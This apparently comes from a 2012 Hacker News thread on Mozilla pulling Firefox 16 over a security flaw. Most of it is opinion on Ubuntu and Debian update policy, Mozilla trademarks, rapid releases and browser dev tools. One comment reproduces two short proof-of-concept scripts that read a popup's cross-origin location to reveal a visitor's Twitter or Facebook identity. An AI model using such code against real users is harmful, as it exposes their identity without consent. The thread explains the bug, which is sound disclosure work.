47 comments

[ 4.1 ms ] story [ 111 ms ] thread
Pulling the download links does nothing for users who already installed or upgraded to FF16. Leaving them vulnerable for the one day it takes Mozilla to fix this, without them even knowing that they are at risk.
Firefox releases go through 18 weeks of testing before release, so everyone on Beta, Aurora or Nightly has been vulnerable for a long time - the exploit simply wasn't known yet.
(comment deleted)
<sarcasm>Thanks Ubuntu for sending this update so quickly!</sarcasm>

I never really thought of Ubuntu as a bleeding-edge distribution, but it seems more and more like one lately. It used to be the distro that "just works". Now, I find myself dealing with more and more bugs as the years go. Debian stable is probably too conservative for a workstation - is there a happy medium distro out there?

Ubuntu pulls some packages from Debian unstable, so if you find Debian stable too conservative, and unstable too broken, testing might be a workable compromise: http://wiki.debian.org/DebianTesting

I personally have found that Debian unstable is more stable that Ubuntu, but my tolerance for bugs might be different than yours.

So someone put out a stable build, someone with plenty of history and name recognition, Ubuntu pushed this out to users quickly and you fault them for it?

If you want Debian Stable, go install Debian Stable.

Ubuntu has decided to closely track Firefox releases because Mozilla doesn't provide security updates for older Firefox versions. I'm not sure what other software receives major version updates within the lifetime of an Ubuntu release (Chromium?), but it's not the norm.

Debian hasn't adapted this policy yet; they still declare a version of Firefox stable and backport patches to it. They've had to switch the name and logos from Firefox to Iceweasel because Mozilla does not allow anyone to independently provide updates and still use the Firefox trademark.

https://wiki.ubuntu.com/DesktopTeam/Specs/Lucid/FirefoxNewSu...

http://wiki.debian.org/Iceweasel

Which makes sense. If you change Firefox, it's no longer the real Firefox, it's a derivative work. Allowing derivative works to use your trademark without careful review and blessing is surely dangerous and misrepresentative.
Take a look at the patches that ubuntu does apply.

In this case there is more than a little politics involved.

This is going off on a tangent, but in comparison to other free software projects Mozilla is unusually strict about trademarks.

LibreOffice, for instance, has a policy that says You can use their trademark if you are 'substantially unmodified', which means "built from the source code provided by TDF, possibly with minor modifications including but not limited to: the enabling or disabling of certain features by default, translations into other languages, changes required for compatibility with a particular operating system distribution, the inclusion of bug-fix patches, or the bundling of additional fonts, templates, artwork and extensions)."

Mike Connor from Mozilla has said that to use the Mozilla trademarks, you have to get prior approval from them for your build configuration and every patch you introduce.

http://bugs.debian.org/cgi-bin/bugreport.cgi?msg=74;bug=3546...

Does The Document Foundation receive any income from their distribution of LibreOffice?
How about debian/testing? Personally I run unstable and have never had any issue that I could not deal with.
Linux Mint perhaps.
If Firefox hadn't gone on a version roller coasters ride I'd still be using it. At least they pull versions that need more attention. But, FF 16!?!?! 16!!!? Huh? My plugins stopped working long ago and I stopped taking Mozilla seriously long ago, well not long ago, maybe a couple of years ago when I switched to Chrome. It's weird I thought Google was a financial supporter of Mozilla?
If Firefox hadn't gone on a version roller coasters ride I'd still be using it. At least they pull versions that need more attention. But, FF 16!?!?! 16!!!? Huh?

. . . you do know Chrome's at version 22 and version 24 is in dev release, right?

Knock FF for the more disruptive update process, and for breaking plugins in earlier releases, sure. But (AFAIK) the plugin interfaces have been stable for quite some time now, and Firefox 15 introduced true silent updates. They seem to have fixed the pain points in their rapid release schedule.

If you use Chrome, however, you cannot knock them for iterating more quickly; Chrome's in the same boat.

>> If you use Chrome, however, you cannot knock them for iterating more quickly; Chrome's in the same boat.

My Chrome plugins don't break. They can change the version every day for all I care just don't break my plugins, extensions.

Guess what? That happens with Firefox too.
And, as I said, Firefox no longer breaks plugins. Yes, they did. Yes, that was bad. They claimed, and I believe, that was necessary, but today their plugin interfaces are stable and have been stable for quite some time.

Also, believe me, Chrome is not without its bugs or regressions. Rapid iteration means things will break more often, by its very nature. Hence my statement: you can't knock Firefox for rapid releases if you've moved to Chrome. You're in the same damn boat.

The plugins thing stopped very shortly after the quick-release schedule happened. Updates are now silent (as with Chrome).
I try almost every FF release dude, and I am still disappointed, it almost seems like, nah.
I love Firefox.

I use it because no other browser handles 30+ tabs like a champ while only using between 800GB-1.3 GB while still being fast. Chrome uses anywhere between 1GB - 1.8GB. And just look at Chrome's mess. How do I even tell which tabs are which? That's why I really like Firefox's Tab Groups feature. I always have 3 tab groups and it's incredibly easy to switch between them. And then there are great extensions like Tab Mix Plus, NoScript, Firebug...

Moreover, Mozilla is the one company that I really trust. They genuinely care about user privacy, net neutrality etc. Google, not so much.

It's Chrome that makes me yawn.

So, you left Firefox not because they release often, but because their extension system is lacking. At least be articulate in your criticism, it will better help them improve.
I left because they went on a version roller coaster which was confusing, that broke plugins like oh Quake which was fun but important plugins in addition to that.

Oh, and JavaScript was faster in Chrome, FF did improve JS speed though.

Do you mean extensions or plugins? Either way, both of those are resolved in new version of Firefox. Yes, it was annoying and it was partially why I stopped using it in the first place.

However, those are no longer true and FF is very competitive on speed now (well, I'm still waiting for Linux to shake off all the cruft from the 2 years that they simply ignored us), but it's quite fast in my Windows VM and Mac.

edit: I'm now the third person in this thread to tell you that the Firefox upgrade experience has become quite seamless. I promise you, I don't work for Mozilla and I'm betting the other folks don't either. I use Chrome 99% of the time, I have no reason to lie about Firefox being good.

edit2: What plugins do people legitimately use today? Ok, I whitelist Flash, but other than that? Ooops, turns out I also have NaCl and Chrome's PDF viewer allowed.

Yes it was unfortunate to see add-ons break when we moved from version 3.6, but it was for good, if you come back you will notice all of the add-ons updated and working, a big performance boost and more stability, and you can update effortless without breaking things, most of the add-on dev's have caught on with the release cycle, and those who didn't are in my opinion not worth it anyway, but take this with a grain of salt I mostly have Firebug, Yslow, Clear Cache and Colorzilla Color Picker installed.

I personally always have both Chrome and Firefox open, Chrome seems more responsive at times ( at least on my Macbook Pro ), but I can't get any productivity out of it (I'm a Web Dev) Firefox is a big winner for me here.

And one more thing about version numbers, chrome latest version is 22.0.1229.94

How oh how are you more productive in Firefox than Chrome as a web dev? (Despite my incredulity, I'm serious) I'm a web dev and I'd scream at you long before I let you replace my WebKit inspector even with some of the newer Firefox tools.
It has to bee a taste thing, I'm not that sold on the new firefox tools either, I've even submitted some bugs [https://bugzilla.mozilla.org/show_bug.cgi?id=789675] but firebug is still deep in my work habits, I did see the post about chrome tools, I must admit it does look more advanced, anyway if I could change the font, background and foreground colors I would think of moving to chrome to do my dev work, I'm not feeling the red text on the styles attributes, a green/blue combination like firebug looks better.

Yes I just admitted chrome dev tools are better.

>> Yes I just admitted chrome dev tools are better.

Even when I used FF and as much as I liked Firebug the Chrome Dev Tools are better for me as well.

Haha, I was really confused by:

>I could change the font, background and foreground colors I would think of moving to chrome to do my dev work

I'm sitting here going "...uh, I bet you can do that in IE's tools"? In seriousness though, no, I appreciate your honesty. Everyone has their preferences. I uh, will try to refrain from judging your horrible choices (I'm kidding).

I was mostly worried that something major changed in the last few versions of Firefox. I'm fortunate that my current projects are for myself, and thus I don't venture off of my existing tools too much, even for testing.

You can skin -- change fonts, backgrounds, and foregrounds -- Chrome's dev tools: http://darcyclarke.me/design/skin-your-chrome-inspector/

You can even inspect an inspector to dig right into selectors.

Oh, my, god.

I wish there were flattr for HN (which I had to think about to remember the name of to then mention it).

If you're curious like I was, you can find the details of the vulnerability described by Gareth Heyes at http://www.thespanner.co.uk/2012/10/10/firefox-knows-what-yo...

His proof-of-concept of the vulnerability can be found at http://www.businessinfo.co.uk/labs/firefox_knows_what_your_f... (Best fetched via curl... or Firefox 16.0 with an active Twitter session if you're daring.)

Or you can just see the source here:

  <!doctype html>
  <script>
  function poc() {
    var win = window.open('https://twitter.com/lists/',
      'newWin', 'width=200,height=200');
    setTimeout(function(){
      alert('Hello '+/^https:\/\/twitter.com\/([^/]+)/.exec(win.location)[1])
    }, 5000);
  }
  </script>
  <input type=button value="Firefox knows" onclick="poc()">
edit: As others discovered, the regex stuff is an unnecessary red herring. Here's a simplified POC that uses Facebook to discover your vanity URL:

  <!doctype html>
  <script>
  function poc() {
    var win = window.open('https://facebook.com/profile.php',
      'newWin', 'width=200,height=200');
    setTimeout(function(){
      alert('Hello ' + win.location);
    }, 5000);
  }
  </script>
  <input type=button value="Firefox knows" onclick="poc()">
Given that this bug was likely there for at least 12 weeks in Beta and Aurora releases, it sort-of makes you question if the release schedule couldn't be even faster by skipping one of these or at least try to encourage much more people (certainly the ones who can pull off the above) to try Betas. Having 18 weeks of lead-time for a release clearly doesn't do much good when nobody tries it beforehand.

There were chemspills for Firefox 13, 14, 15 and now 16. None of those seemed to be caused by the rapid development schedule, they were (IIRC) all issues discovered because the release had much wider exposure compared to beta.

On the other hand, Firefox now does silent updates, so if there hadn't been so much publicity about the Firefox release (or on the update being blocked), it might have been a non-event. In a few hours everyone will be on 16.0.1. I'm not sure if this would have happend to a non-open-source project, if we'd even hear about it.

Maybe we can make it clearer that "Beta" is really Mozillian for "Release Candidate"?

I agree. Chrome does well with just three channels: Dev, Beta, and Release (ignoring the Canary channel as a special case of Dev).

I support shortening the release cycle (to maybe 4 weeks) and increasing the number of Beta users. Having two channels (Aurora and Beta) between dev and release is useful because it widens the user population as the release stabilizes. As you point out, some bugs can only be found by increasing the test population, rather than the test time. Early adopters that install Aurora or Beta are not representative of the "Joe User" population, who probably suffer from malware, anti-virus software, and older hardware.

(posted from Firefox Nightly 19.0a1 :)

Chrome does well with just three channels: Dev, Beta, and Release (ignoring the Canary channel as a special case of Dev)

Like Aurora is a special case of Nightly? What's the difference? (I'm not familiar with the Chrome dev process)

I support shortening the release cycle (to maybe 4 weeks)

How many bugs are backed out in Beta? It's surprisingly many, which suggests that 12 weeks is quite short.

Having two channels (Aurora and Beta) between dev and release is useful because it widens the user population as the release stabilizes

I'm not sure I agree on this. I mean, are there people running Beta that would run Release if Beta wasn't available? I'd think those people would be on Aurora.

Early adopters that install Aurora or Beta are not representative of the "Joe User" population, who probably suffer from malware, anti-virus software, and older hardware

I'm afraid you're right and this makes chem-spills unavoidable, though this particularly one is sad as it looked entirely avoidable.

AFAIK, Canary is like Nightly and Dev is a state snapshot of Canary updated once or twice per week.

Rereading your original comment, I see that by "faster"releases you meant to increase the number of testers sooner, not uplift the channels sooner. If Mozilla did that, the Nightly channel might need more stabilization before

FWIW, I have experienced this in all my real life work experiences too. Dev+staging before production always appeared to catch exactly the same bugs as any additional number of steps in between.

I guess people who are willing to run aurora would still run beta, while people who didn't run beta are likely not running aurora either. The additional step just splits the testers in two areas.

Firefox is a monster. Too big. I switched to Webkit and midori (but there are certainly other small, simple WebKit-based alternatives).

So no to Gecko.

Yes, because Webkit never had security issues, and those alternate browsers have faster patching processes than Mozilla or Google do.

I don't think so.

If FF16 was pulled, why did it _just_ (Thu, Oct 11, 12:05pm PST) download and try to update my 15.0.1? (WinXP) That made me . . . uncomfortable.